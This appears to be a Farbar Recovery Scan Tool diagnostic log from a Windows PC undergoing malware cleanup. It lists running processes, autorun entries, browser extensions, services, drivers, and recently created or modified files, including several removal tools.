(Intel Corporation) C:\Windows\System32\IPROSetMonitor.exe
(Microsoft Corporation) C:\Program Files\Microsoft SQL Server\MSSQL10.SQLEXPRESS\MSSQL\Binn\sqlservr.exe
(Microsoft Corporation) C:\Program Files\Microsoft SQL Server\90\Shared\sqlwriter.exe
(Microsoft Corporation) C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVC.EXE
(Microsoft Corporation) C:\Program Files\Microsoft Security Client\NisSrv.exe
(Microsoft Corporation) C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVCM.EXE
(Microsoft Corporation) C:\Windows\System32\rundll32.exe
() E:\Program Files (x86)\MSI Afterburner\MSIAfterburner.exe
(Microsoft Corporation) C:\Program Files\Microsoft Security Client\msseces.exe
(Flux Software LLC) C:\Users\Tom Jones\AppData\Local\FluxSoftware\Flux\flux.exe
(Logitech©) C:\Program Files (x86)\Logitech\G35\G35.exe
(NETGEAR) C:\Program Files (x86)\NETGEAR\WPN111\WPN111.exe
(Logitech Inc.) C:\Program Files\Logitech\SetPoint II\SetPointII.exe
(Logitech, Inc.) C:\Program Files\Common Files\Logishrd\KHAL2\KHALMNPR.exe
() E:\Program Files (x86)\Sublime Text 3\sublime_text.exe
() E:\Program Files (x86)\Sublime Text 3\plugin_host.exe
(Google Inc.) C:\Users\Tom Jones\AppData\Local\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Users\Tom Jones\AppData\Local\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Users\Tom Jones\AppData\Local\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Users\Tom Jones\AppData\Local\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Users\Tom Jones\AppData\Local\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Users\Tom Jones\AppData\Local\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Users\Tom Jones\AppData\Local\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Users\Tom Jones\AppData\Local\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Users\Tom Jones\AppData\Local\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Users\Tom Jones\AppData\Local\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Users\Tom Jones\AppData\Local\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Users\Tom Jones\AppData\Local\Google\Chrome\Application\chrome.exe
(Valve Corporation) C:\Program Files (x86)\Steam\Steam.exe
(Google Inc.) C:\Users\Tom Jones\AppData\Local\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Users\Tom Jones\AppData\Local\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Users\Tom Jones\AppData\Local\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Users\Tom Jones\AppData\Local\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Users\Tom Jones\AppData\Local\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Users\Tom Jones\AppData\Local\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Users\Tom Jones\AppData\Local\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Users\Tom Jones\AppData\Local\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Users\Tom Jones\AppData\Local\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Users\Tom Jones\AppData\Local\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Users\Tom Jones\AppData\Local\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Users\Tom Jones\AppData\Local\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Users\Tom Jones\AppData\Local\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Users\Tom Jones\AppData\Local\Google\Chrome\Application\chrome.exe
(Valve Corporation) C:\Program Files (x86)\Steam\bin\steamwebhelper.exe
(Skype Technologies S.A.) E:\Program Files\Skype\Phone\Skype.exe
(Valve Corporation) C:\Program Files (x86)\Steam\bin\steamwebhelper.exe
(Apple Inc.) C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe
 
 
==================== Registry (Whitelisted) ==================
 
(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)
 
HKLM\...\Run: [Kernel and Hardware Abstraction Layer] => C:\Windows\KHALMNPR.EXE [130576 2009-06-17] (Logitech, Inc.)
HKLM\...\Run: [MSC] => C:\Program Files\Microsoft Security Client\msseces.exe [1331288 2014-08-22] (Microsoft Corporation)
HKLM-x32\...\Run: [Logitech G35] => C:\Program Files (x86)\Logitech\G35\G35.exe [1811800 2010-10-05] (Logitech©)
HKLM-x32\...\Run: [JMB36X IDE Setup] => C:\Windows\RaidTool\xInsIDE.exe [43632 2010-01-19] ()
HKLM-x32\...\Run: [Adobe ARM] => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [1021128 2014-11-20] (Adobe Systems Incorporated)
Winlogon\Notify\igfxcui: C:\Windows\system32\igfxdev.dll (Intel Corporation)
HKU\S-1-5-21-265094073-1043058997-3425087786-1000\...\Run: [F.lux] => C:\Users\Tom Jones\AppData\Local\FluxSoftware\Flux\flux.exe [1017224 2013-10-23] (Flux Software LLC)
HKU\S-1-5-21-265094073-1043058997-3425087786-1000\...\RunOnce: [Adobe Speed Launcher] => 1422473019
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\NETGEAR WPN111 Smart Wizard.lnk
ShortcutTarget: NETGEAR WPN111 Smart Wizard.lnk -> C:\Program Files (x86)\NETGEAR\WPN111\WPN111.exe (NETGEAR)
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\SetPointII.lnk
ShortcutTarget: SetPointII.lnk -> C:\Program Files\Logitech\SetPoint II\SetPointII.exe (Logitech Inc.)
BootExecute: autocheck autochk * sdnclean64.exe
 
==================== Internet (Whitelisted) ====================
 
(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)
 
HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer: Policy restriction <======= ATTENTION
HKU\S-1-5-21-265094073-1043058997-3425087786-1000\SOFTWARE\Policies\Microsoft\Internet Explorer: Policy restriction <======= ATTENTION
HKU\.DEFAULT\Software\Microsoft\Internet Explorer\Main,Search Page = http://www.microsoft.com/isapi/redir.dll?prd=ie&ar=iesearch
HKU\.DEFAULT\Software\Microsoft\Internet Explorer\Main,Start Page = http://www.microsoft.com/isapi/redir.dll?prd=ie&ar=msnhome
HKU\S-1-5-21-265094073-1043058997-3425087786-1000\Software\Microsoft\Internet Explorer\Main,Search Page = http://www.microsoft.com/isapi/redir.dll?prd=ie&ar=iesearch
SearchScopes: HKU\.DEFAULT -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = 
SearchScopes: HKU\S-1-5-19 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = 
SearchScopes: HKU\S-1-5-20 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = 
BHO: Java™ Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files\Java\jre1.8.0_31\bin\ssv.dll (Oracle Corporation)
BHO: Java™ Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files\Java\jre1.8.0_31\bin\jp2ssv.dll (Oracle Corporation)
BHO: Adblock Plus for IE Browser Helper Object -> {FFCB3198-32F3-4E8B-9539-4324694ED664} -> C:\Program Files\Adblock Plus for IE\AdblockPlus64.dll (Adblock Plus)
BHO-x32: Java™ Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files (x86)\Java\jre1.8.0_31\bin\ssv.dll (Oracle Corporation)
BHO-x32: Java™ Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files (x86)\Java\jre1.8.0_31\bin\jp2ssv.dll (Oracle Corporation)
Handler-x32: skype4com - {FFC8B962-9B40-4DFF-9458-1830C7DD7F5D} - C:\Program Files (x86)\Common Files\Skype\Skype4COM.dll (Skype Technologies)
Tcpip\Parameters: [DhcpNameServer] 75.75.75.75 75.75.76.76
 
FireFox:
========
FF Plugin: @java.com/DTPlugin,version=11.31.2 -> C:\Program Files\Java\jre1.8.0_31\bin\dtplugin\npDeployJava1.dll (Oracle Corporation)
FF Plugin: @java.com/JavaPlugin,version=11.31.2 -> C:\Program Files\Java\jre1.8.0_31\bin\plugin2\npjp2.dll (Oracle Corporation)
FF Plugin: @microsoft.com/GENUINE -> C:\Windows\system32\Wat\npWatWeb.dll (Microsoft Corporation)
FF Plugin: @Microsoft.com/NpCtrl,version=1.0 -> C:\Program Files\Microsoft Silverlight\5.1.31211.0\npctrl.dll ( Microsoft Corporation)
FF Plugin-x32: @adobe.com/FlashPlayer -> C:\Windows\SysWOW64\Macromed\Flash\NPSWF32.dll ()
FF Plugin-x32: @Apple.com/iTunes,version=1.0 -> E:\Program Files (x86)\iTunes\Mozilla Plugins\npitunes.dll ()
FF Plugin-x32: @java.com/DTPlugin,version=11.31.2 -> C:\Program Files (x86)\Java\jre1.8.0_31\bin\dtplugin\npDeployJava1.dll (Oracle Corporation)
FF Plugin-x32: @java.com/JavaPlugin,version=11.31.2 -> C:\Program Files (x86)\Java\jre1.8.0_31\bin\plugin2\npjp2.dll (Oracle Corporation)
FF Plugin-x32: @microsoft.com/GENUINE -> C:\Windows\system32\Wat\npWatWeb.dll (Microsoft Corporation)
FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Reader 11.0\Reader\AIR\nppdf32.dll (Adobe Systems Inc.)
FF Plugin HKU\S-1-5-21-265094073-1043058997-3425087786-1000: @tools.google.com/Google Update;version=3 -> C:\Users\Tom Jones\AppData\Local\Google\Update\1.3.25.11\npGoogleUpdate3.dll (Google Inc.)
FF Plugin HKU\S-1-5-21-265094073-1043058997-3425087786-1000: @tools.google.com/Google Update;version=9 -> C:\Users\Tom Jones\AppData\Local\Google\Update\1.3.25.11\npGoogleUpdate3.dll (Google Inc.)
FF Plugin HKU\S-1-5-21-265094073-1043058997-3425087786-1000: ubisoft.com/uplaypc -> C:\Program Files (x86)\Ubisoft\Ubisoft Game Launcher\npuplaypc.dll No File
FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\plugins\npatgpc.dll (Cisco WebEx LLC)
FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\plugins\NPOFF12.DLL (Microsoft Corporation)
FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\plugins\nppdf32.dll (Adobe Systems Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\plugins\npwachk.dll (Nullsoft, Inc.)
 
Chrome: 
=======
CHR HomePage: Default -> hxxp://www.yahoo.com/
CHR DefaultSearchURL: Default -> http://www.google.com/search?q={searchTerms}
CHR DefaultSuggestURL: Default -> 
CHR Profile: C:\Users\Tom Jones\AppData\Local\Google\Chrome\User Data\Default
CHR Extension: (Tab-Snap) - C:\Users\Tom Jones\AppData\Local\Google\Chrome\User Data\Default\Extensions\ajjloplcjllkammemhenacfjcccockde [2013-01-18]
CHR Extension: (Google Drive) - C:\Users\Tom Jones\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2012-12-22]
CHR Extension: (Regex Search) - C:\Users\Tom Jones\AppData\Local\Google\Chrome\User Data\Default\Extensions\bcdabfmndggphffkchfdcekcokmbnkjl [2014-11-10]
CHR Extension: (Google Voice Search Hotword (Beta)) - C:\Users\Tom Jones\AppData\Local\Google\Chrome\User Data\Default\Extensions\bepbmhgboaologfdajaanbcjmnhjmhfn [2014-05-21]
CHR Extension: (James White) - C:\Users\Tom Jones\AppData\Local\Google\Chrome\User Data\Default\Extensions\bkeidgmehkdjmpjodpjkepolokanalkm [2012-12-22]
CHR Extension: (Grooveshark) - C:\Users\Tom Jones\AppData\Local\Google\Chrome\User Data\Default\Extensions\blelaljgakacjdeaggpjilljobdmboff [2012-12-22]
CHR Extension: (Adblock Plus) - C:\Users\Tom Jones\AppData\Local\Google\Chrome\User Data\Default\Extensions\cfhdojbkjhnklbpkdaibdccddilifddb [2012-12-22]
CHR Extension: (Google Search) - C:\Users\Tom Jones\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf [2012-12-22]
CHR Extension: (Bookmark Manager) - C:\Users\Tom Jones\AppData\Local\Google\Chrome\User Data\Default\Extensions\gmlllbghnfkpflemihljekbapjopfjik [2015-01-23]
CHR Extension: (ScriptBlock) - C:\Users\Tom Jones\AppData\Local\Google\Chrome\User Data\Default\Extensions\hcdjknjpbnhdoabbngpmfekaecnpajba [2015-01-22]
CHR Extension: (Windows Media Player Extension for HTML5) - C:\Users\Tom Jones\AppData\Local\Google\Chrome\User Data\Default\Extensions\hokdglbhghcebcopdbanieangmcamaak [2012-12-25]
CHR Extension: (Reddit Enhancement Suite) - C:\Users\Tom Jones\AppData\Local\Google\Chrome\User Data\Default\Extensions\kbmfpngjjgdllneeigpgjifpgocmfgmb [2013-08-27]
CHR Extension: (Steam Trader Helper (auto-buy)) - C:\Users\Tom Jones\AppData\Local\Google\Chrome\User Data\Default\Extensions\lhoahihokddepjlegpenefeaahdkojog [2014-06-16]
CHR Extension: (Dota 2 Lounge Helper) - C:\Users\Tom Jones\AppData\Local\Google\Chrome\User Data\Default\Extensions\ljmpblpndedodbmceeghpahabeppemed [2014-11-08]
CHR Extension: (DotA 2 Match Ticker) - C:\Users\Tom Jones\AppData\Local\Google\Chrome\User Data\Default\Extensions\nejdjlaibiicicciokonbbkecjleilon [2013-07-14]
CHR Extension: (Google Wallet) - C:\Users\Tom Jones\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2014-07-01]
CHR Extension: (Auto Refresh Plus) - C:\Users\Tom Jones\AppData\Local\Google\Chrome\User Data\Default\Extensions\oilipfekkmncanaajkapbpancpelijih [2014-01-16]
CHR Extension: (Enhanced Steam) - C:\Users\Tom Jones\AppData\Local\Google\Chrome\User Data\Default\Extensions\okadibdjfemgnhjiembecghcbfknbfhg [2015-01-02]
CHR Extension: (Beautipedia Modified, Chromified) - C:\Users\Tom Jones\AppData\Local\Google\Chrome\User Data\Default\Extensions\oolicfpkpnpbaonkibdjkpbchakfdmig [2014-12-18]
CHR Extension: (Page Monitor) - C:\Users\Tom Jones\AppData\Local\Google\Chrome\User Data\Default\Extensions\pemhgklkefakciniebenbfclihhmmfcd [2014-01-16]
CHR Extension: (SpeakIt!) - C:\Users\Tom Jones\AppData\Local\Google\Chrome\User Data\Default\Extensions\pgeolalilifpodheeocdmbhehgnkkbak [2013-12-01]
CHR Extension: (Gmail) - C:\Users\Tom Jones\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2012-12-22]
StartMenuInternet: Google Chrome.BIP3FHZVCC3YSCWKHHYNR3ZFZM - C:\Users\Tom Jones\AppData\Local\Google\Chrome\Application\chrome.exe
 
==================== Services (Whitelisted) =================
 
(If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.)
 
R2 asComSvc; C:\Program Files (x86)\ASUS\AXSP\1.00.13\atkexComSvc.exe [918144 2010-11-03] ()
R2 asHmComSvc; C:\Program Files (x86)\ASUS\AAHM\1.00.14\aaHMSvc.exe [915584 2010-12-02] ()
R2 AsSysCtrlService; C:\Program Files (x86)\ASUS\AsSysCtrlService\1.00.11\AsSysCtrlService.exe [586880 2010-10-21] ()
S3 c2wts; C:\Program Files\Windows Identity Foundation\v3.5\c2wtshost.exe [15768 2010-02-02] (Microsoft Corporation)
S3 fussvc; C:\Program Files (x86)\Windows Kits\8.1\App Certification Kit\fussvc.exe [142336 2013-08-22] (Microsoft Corporation) [File not signed]
S3 IDriverT; C:\Program Files (x86)\Common Files\InstallShield\Driver\11\Intel 32\IDriverT.exe [69632 2005-04-03] (Macrovision Corporation) [File not signed]
R2 MsMpSvc; C:\Program Files\Microsoft Security Client\MsMpEng.exe [23784 2014-08-22] (Microsoft Corporation)
R2 MSSQL$SQLEXPRESS; C:\Program Files\Microsoft SQL Server\MSSQL10.SQLEXPRESS\MSSQL\Binn\sqlservr.exe [57617752 2009-03-30] (Microsoft Corporation)
R3 NisSrv; C:\Program Files\Microsoft Security Client\NisSrv.exe [368624 2014-08-22] (Microsoft Corporation)
S3 rpcapd; C:\Program Files (x86)\WinPcap\rpcapd.exe [118520 2013-02-28] (Riverbed Technology, Inc.)
S2 SkypeUpdate; E:\Program Files\Skype\Updater\Updater.exe [315496 2014-12-11] (Skype Technologies)
S4 SQLAgent$SQLEXPRESS; C:\Program Files\Microsoft SQL Server\MSSQL10.SQLEXPRESS\MSSQL\Binn\SQLAGENT.EXE [427880 2009-03-30] (Microsoft Corporation)
S3 Te.Service; C:\Program Files (x86)\Windows Kits\8.1\Testing\Runtimes\TAEF\Wex.Services.exe [119808 2013-08-22] (Microsoft Corporation) [File not signed]
S3 VsEtwService120; C:\Program Files\Microsoft Visual Studio 12.0\Common7\Packages\Debugger\Services\VsEtwService.exe [87728 2013-10-04] (Microsoft Corporation)
S3 WinDefend; C:\Program Files\Windows Defender\mpsvc.dll [1011712 2013-05-27] (Microsoft Corporation)
 
==================== Drivers (Whitelisted) ====================
 
(If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.)
 
R1 AsIO; C:\Windows\SysWow64\drivers\AsIO.sys [13440 2010-08-24] ()
R2 IntelHaxm; C:\Windows\System32\DRIVERS\IntelHaxm.sys [84992 2014-11-18] (Intel  Corporation)
R3 LADF_DHP2; C:\Windows\System32\DRIVERS\ladfDHP2amd64.sys [62168 2010-09-29] (Logitech)
R3 LADF_SBVM; C:\Windows\System32\DRIVERS\ladfSBVMamd64.sys [377176 2010-09-29] (Logitech)
R0 MpFilter; C:\Windows\System32\DRIVERS\MpFilter.sys [269008 2014-07-17] (Microsoft Corporation)
R2 NisDrv; C:\Windows\System32\DRIVERS\NisDrvWFP.sys [125584 2014-07-17] (Microsoft Corporation)
S3 NPF; C:\Windows\System32\drivers\npf.sys [36600 2013-02-28] (Riverbed Technology, Inc.)
R3 nvvad_WaveExtensible; C:\Windows\System32\drivers\nvvad64v.sys [40392 2014-03-31] (NVIDIA Corporation)
S3 PCAMp50a64; C:\Windows\System32\Drivers\PCAMp50a64.sys [43328 2006-11-28] (Printing Communications Assoc., Inc. (PCAUSA))
R3 PCASp50a64; C:\Windows\System32\Drivers\PCASp50a64.sys [41280 2006-11-28] (Printing Communications Assoc., Inc. (PCAUSA))
S3 RimVSerPort; C:\Windows\System32\DRIVERS\RimSerial_AMD64.sys [44032 2011-07-20] (Research in Motion Ltd)
S3 rspCrash; C:\Windows\System32\DRIVERS\rspCrash64.sys [13568 2014-07-14] (Resplendence Software Projects Sp.)
R3 RTCore64; E:\Program Files (x86)\MSI Afterburner\RTCore64.sys [13480 2014-05-19] ()
S3 s1018bus; C:\Windows\System32\DRIVERS\s1018bus.sys [113704 2009-03-25] (MCCI Corporation)
S3 s1018mdfl; C:\Windows\System32\DRIVERS\s1018mdfl.sys [19496 2009-03-25] (MCCI Corporation)
S3 s1018mdm; C:\Windows\System32\DRIVERS\s1018mdm.sys [153128 2009-03-25] (MCCI Corporation)
S3 s1018mgmt; C:\Windows\System32\DRIVERS\s1018mgmt.sys [133160 2009-03-25] (MCCI Corporation)
S3 s1018nd5; C:\Windows\System32\DRIVERS\s1018nd5.sys [34856 2009-03-25] (MCCI Corporation)
S3 s1018obex; C:\Windows\System32\DRIVERS\s1018obex.sys [128552 2009-03-25] (MCCI Corporation)
S3 s1018unic; C:\Windows\System32\DRIVERS\s1018unic.sys [146472 2009-03-25] (MCCI Corporation)
S3 SaiK0836; C:\Windows\System32\DRIVERS\SaiK0836.sys [172040 2010-07-08] (Saitek)
R3 SaiMini; C:\Windows\System32\DRIVERS\SaiMini.sys [22792 2010-07-08] (Saitek)
R3 SaiNtBus; C:\Windows\System32\drivers\SaiBus.sys [50056 2010-07-08] (Saitek)
S3 VBoxUSB; C:\Windows\System32\Drivers\VBoxUSB.sys [115488 2014-03-26] (Oracle Corporation)
S3 vpnva; C:\Windows\System32\DRIVERS\vpnva64-6.sys [52080 2013-07-19] (Cisco Systems, Inc.)
R3 WPN111; C:\Windows\System32\DRIVERS\WPN111vx.sys [1075712 2008-08-04] (Atheros Communications, Inc.)
S3 ALSysIO; \??\C:\Users\TOMJO~1\AppData\Local\Temp\ALSysIO64.sys [X]
S3 catchme; \??\C:\ComboFix\catchme.sys [X]
 
==================== NetSvcs (Whitelisted) ===================
 
(If an item is included in the fixlist, it will be removed from the registry. Any associated file could be listed separately to be moved.)
 
 
==================== One Month Created Files and Folders ========
 
(If an entry is included in the fixlist, the file\folder will be moved.)
 
2015-01-28 14:27 - 2015-01-28 14:27 - 00000000 ____D () C:\Users\Tom Jones\Downloads\FRST-OlderVersion
2015-01-27 22:54 - 2015-01-27 22:54 - 00000739 _____ () C:\Users\Tom Jones\AppData\Local\recently-used.xbel
2015-01-27 22:54 - 2015-01-27 22:54 - 00000000 ____D () C:\Users\Tom Jones\AppData\Roaming\Wireshark
2015-01-27 22:06 - 2015-01-27 22:07 - 00000000 ____D () C:\Users\Tom Jones\AppData\Local\HP
2015-01-27 22:06 - 2015-01-27 22:06 - 00000057 _____ () C:\ProgramData\Ament.ini
2015-01-27 22:06 - 2015-01-27 22:06 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\HP
2015-01-27 22:06 - 2015-01-27 22:06 - 00000000 ____D () C:\ProgramData\HP
2015-01-27 22:06 - 2015-01-27 22:06 - 00000000 ____D () C:\Program Files\HP
2015-01-27 22:06 - 2015-01-27 22:06 - 00000000 ____D () C:\Program Files (x86)\HP
2015-01-27 22:06 - 2012-10-17 04:31 - 00741480 ____N (Hewlett-Packard Co.) C:\Windows\system32\HPDiscoPM4812.dll
2015-01-27 21:56 - 2015-01-27 22:19 - 00000000 ____D () C:\Users\Tom Jones\AppData\Local\gtk-2.0
2015-01-27 21:19 - 2015-01-27 21:19 - 00000661 _____ () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Wireshark.lnk
2015-01-27 21:19 - 2015-01-27 21:19 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\WinPcap
2015-01-27 21:19 - 2015-01-27 21:19 - 00000000 ____D () C:\Program Files (x86)\WinPcap
2015-01-26 17:55 - 2015-01-26 17:55 - 00000000 ____D () C:\ProgramData\Electronic Arts
2015-01-26 17:31 - 2015-01-26 17:31 - 00012124 _____ () C:\Users\Tom Jones\Downloads\Stranded_Deep_v0.01_setup.exe.torrent
2015-01-26 01:10 - 2015-01-26 01:10 - 00012844 _____ () C:\Users\Tom Jones\Downloads\The Hacker's Manual (2015).pdf.torrent
2015-01-26 01:00 - 2015-01-26 01:00 - 00014961 _____ () C:\Users\Tom Jones\Downloads\The Little Death (2014) [1080p].torrent
2015-01-26 00:59 - 2015-01-26 00:59 - 00019139 _____ () C:\Users\Tom Jones\Downloads\Ronin (1998) [1080p].torrent
2015-01-26 00:50 - 2015-01-26 00:50 - 01677904 _____ (BitTorrent Inc.) C:\Users\Tom Jones\Downloads\uTorrent.exe
2015-01-25 19:08 - 2015-01-25 19:15 - 00025370 _____ () C:\ComboFix.txt
2015-01-25 18:56 - 2015-01-25 18:56 - 00000000 ____D () C:\Users\Tom Jones\AppData\Roaming\JetBrains
2015-01-24 12:37 - 2015-01-24 12:37 - 00025946 _____ () C:\Users\Tom Jones\Downloads\ComboFix.txt
2015-01-24 12:19 - 2015-01-25 19:08 - 00000000 ____D () C:\Qoobox
2015-01-24 12:19 - 2015-01-24 12:22 - 00000000 ____D () C:\Windows\erdnt
2015-01-24 12:19 - 2011-06-26 01:45 - 00256000 _____ () C:\Windows\PEV.exe
2015-01-24 12:19 - 2010-11-07 12:20 - 00208896 _____ () C:\Windows\MBR.exe
2015-01-24 12:19 - 2009-04-19 23:56 - 00060416 _____ (NirSoft) C:\Windows\NIRCMD.exe
2015-01-24 12:19 - 2000-08-30 19:00 - 00518144 _____ (SteelWerX) C:\Windows\SWREG.exe
2015-01-24 12:19 - 2000-08-30 19:00 - 00406528 _____ (SteelWerX) C:\Windows\SWSC.exe
2015-01-24 12:19 - 2000-08-30 19:00 - 00098816 _____ () C:\Windows\sed.exe
2015-01-24 12:19 - 2000-08-30 19:00 - 00080412 _____ () C:\Windows\grep.exe
2015-01-24 12:19 - 2000-08-30 19:00 - 00068096 _____ () C:\Windows\zip.exe
2015-01-24 12:16 - 2015-01-24 12:16 - 05609462 ____R (Swearware) C:\Users\Tom Jones\Downloads\ComboFix.exe
2015-01-23 23:49 - 2015-01-23 23:49 - 04197016 _____ (Kaspersky Lab ZAO) C:\Users\Tom Jones\Downloads\tdsskiller.exe
2015-01-23 20:07 - 2015-01-26 18:14 - 02194432 _____ () C:\Users\Tom Jones\Downloads\AdwCleaner.exe
2015-01-23 12:35 - 2015-01-23 12:35 - 00000000 ____D () C:\_OTL
2015-01-23 12:34 - 2015-01-23 12:34 - 00602112 _____ (OldTimer Tools) C:\Users\Tom Jones\Downloads\OTL.exe
2015-01-23 08:07 - 2015-01-28 14:23 - 00004138 _____ () C:\Windows\PFRO.log
2015-01-23 08:07 - 2015-01-28 14:23 - 00002856 _____ () C:\Windows\setupact.log
2015-01-23 08:07 - 2015-01-23 08:07 - 00000000 _____ () C:\Windows\setuperr.log
2015-01-23 00:23 - 2015-01-28 14:27 - 02130432 _____ (Farbar) C:\Users\Tom Jones\Downloads\FRST64.exe
2015-01-22 20:49 - 2015-01-28 14:22 - 00000000 ____D () C:\AdwCleaner
2015-01-22 20:01 - 2015-01-28 14:27 - 00020450 _____ () C:\Users\Tom Jones\Downloads\FRST.txt
2015-01-22 20:00 - 2015-01-28 14:27 - 00000000 ____D () C:\FRST
2015-01-22 00:05 - 2015-01-22 00:05 - 00000000 ____D () C:\Users\Tom Jones\.jmc
2015-01-22 00:02 - 2015-01-22 00:02 - 00000000 ____D () C:\Windows\System32\Tasks\Safer-Networking
2015-01-21 23:50 - 2015-01-22 21:10 - 00000000 ____D () C:\ProgramData\Malwarebytes' Anti-Malware (portable)
2015-01-21 23:49 - 2015-01-22 21:11 - 00000000 ____D () C:\Users\Tom Jones\Desktop\mbar
2015-01-21 22:33 - 2015-01-22 11:23 - 00037624 _____ () C:\Windows\system32\Drivers\TrueSight.sys
2015-01-21 22:33 - 2015-01-21 22:33 - 00000000 ____D () C:\ProgramData\RogueKiller
2015-01-20 16:15 - 2015-01-20 16:15 - 00000958 _____ () C:\Users\Tom Jones\Desktop\Android Studio.lnk
2015-01-15 15:06 - 2015-01-15 15:06 - 00000000 ____D () C:\Users\Tom Jones\Documents\FIFA 15
2015-01-13 16:45 - 2014-12-18 22:06 - 00210432 _____ (Microsoft Corporation) C:\Windows\system32\profsvc.dll
2015-01-13 16:45 - 2014-12-18 20:46 - 00141312 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\mrxdav.sys
2015-01-13 16:45 - 2014-12-12 00:35 - 05553592 _____ (Microsoft Corporation) C:\Windows\system32\ntoskrnl.exe
2015-01-13 16:45 - 2014-12-12 00:31 - 00503808 _____ (Microsoft Corporation) C:\Windows\system32\srcore.dll
2015-01-13 16:45 - 2014-12-12 00:31 - 00296960 _____ (Microsoft Corporation) C:\Windows\system32\rstrui.exe
2015-01-13 16:45 - 2014-12-12 00:31 - 00050176 _____ (Microsoft Corporation) C:\Windows\system32\srclient.dll
2015-01-13 16:45 - 2014-12-12 00:11 - 03971512 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ntkrnlpa.exe
2015-01-13 16:45 - 2014-12-12 00:11 - 03916728 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ntoskrnl.exe
2015-01-13 16:45 - 2014-12-12 00:07 - 00043008 _____ (Microsoft Corporation) C:\Windows\SysWOW64\srclient.dll
2015-01-13 16:45 - 2014-12-11 12:47 - 00087040 _____ (Microsoft Corporation) C:\Windows\system32\TSWbPrxy.exe
2015-01-13 16:45 - 2014-12-05 23:17 - 00303616 _____ (Microsoft Corporation) C:\Windows\system32\nlasvc.dll
2015-01-13 16:45 - 2014-12-05 22:50 - 00156672 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ncsi.dll
2015-01-13 16:45 - 2014-12-05 22:50 - 00052224 _____ (Microsoft Corporation) C:\Windows\SysWOW64\nlaapi.dll
2015-01-01 03:55 - 2015-01-22 21:15 - 00000192 _____ () C:\Users\Tom Jones\Downloads\111111111111.txt
 
==================== One Month Modified Files and Folders =======
 
(If an entry is included in the fixlist, the file\folder will be moved.)
 
2015-01-28 14:24 - 2012-06-03 19:17 - 00000000 ____D () C:\Users\Tom Jones\AppData\Roaming\Skype
2015-01-28 14:23 - 2012-03-24 06:13 - 00000000 ____D () C:\Program Files (x86)\Steam
2015-01-28 14:23 - 2009-07-14 00:08 - 00000006 ____H () C:\Windows\Tasks\SA.DAT
2015-01-28 14:22 - 2013-10-12 14:32 - 00000932 _____ () C:\Windows\Tasks\GoogleUpdateTaskUserS-1-5-21-265094073-1043058997-3425087786-1000UA.job
2015-01-28 14:22 - 2012-09-15 00:14 - 01943480 _____ () C:\Windows\WindowsUpdate.log
2015-01-28 12:03 - 2009-07-13 23:45 - 00021280 ____H () C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0
